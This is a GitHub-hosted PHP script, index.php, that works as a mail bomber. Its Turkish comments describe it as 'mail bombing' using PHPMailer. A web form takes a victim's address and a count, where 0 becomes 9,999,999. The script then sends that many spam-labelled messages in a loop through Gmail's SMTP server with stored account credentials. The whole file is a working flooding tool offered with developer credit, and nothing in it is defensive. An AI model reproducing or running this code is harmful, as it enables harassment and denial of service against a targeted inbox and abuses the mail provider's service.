-
Notifications
You must be signed in to change notification settings - Fork 5
/
index.php
49 lines (43 loc) · 2.12 KB
/
index.php
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
<?php
set_time_limit(0);
$self = $_SERVER['PHP_SELF'];
$mail2 = @$_POST['ucanmail'];
$adet = @$_POST['adet'];
echo "<form action='$self' method='POST'>
Send To -> <input type='text' name='ucanmail' /> <br>How Many? (0 = unlimited)<input type='number' name='adet' value='0'/><input type='submit' value='Send' />";
include ("ayarlar.php");
// PHPMailer Kütüphanesi Yardımıyla Mail Bombalama İşlemi. İndirmek isteyenler için -> http://code.google.com/a/apache-extras.org/p/phpmailer/
include("class.phpmailer.php");
include("class.smtp.php"); // class.phpmailer.php çalışmaz ise burdan devam edicek. Çalışıp çalışmamasını kütüphane kendisi karar veriyor...
if($adet=="0"){
$adet = 9999999;
}
if($mail2!=""){
for($a=1;$a<=$adet;$a++){
$mail = new PHPMailer();
$mail->IsSMTP();
$mail->SMTPAuth = true; // SMTP Güvenlik Doğrulamasını Aktif Ediyoruz
$mail->SMTPSecure = "ssl"; // SMTP Gizlilik Türü ssl yada tls
$mail->Host = "smtp.gmail.com"; // SMTP Sunucusunu Belirliyoruz.
$mail->Port = 465; // SMTP Portunu belirliyoruz.
$mail->Username = $mailkadi; // GMAIL kullanıcı adımız
$mail->Password = $mailsifre; // GMAIL şifremiz
$mail->From = "[email protected]";
$mail->FromName = "Spam Başlığı.";
$mail->Subject = "Spam Konusu....";
$mail->AltBody = "Spam içeriği, lorem ipsum -> Lorem Ipsum Die Sit AmerLorem Ipsum Die Sit AmerLorem Ipsum Die Sit AmerLorem Ipsum Die Sit AmerLorem Ipsum Die Sit AmerLorem Ipsum Die Sit AmerLorem Ipsum Die Sit AmerLorem Ipsum Die Sit Amer"; //Yollanacak Yazı
$mail->WordWrap = 50; // set word wrap
$mail->MsgHTML("BOMB TEST ");
$mail->AddAddress($mail2 ,"Hi Bro :d");
if(!$mail->Send()) {
echo "Mail yollarken hata sebep : " . $mail->ErrorInfo;
} else {
echo "$a,";
}
}
}else{
echo "<br><br><br><b>Developed by <a href='https://github.com/furkansandal' >Furkan Sandal </a> @furkansandal -> Instagram";
die();
}
echo "tane yollandı.<br><br><br><b>Developed by <a href='https://github.com/furkansandal' >Furkan Sandal </a> @furkansandal -> Instagram";
?>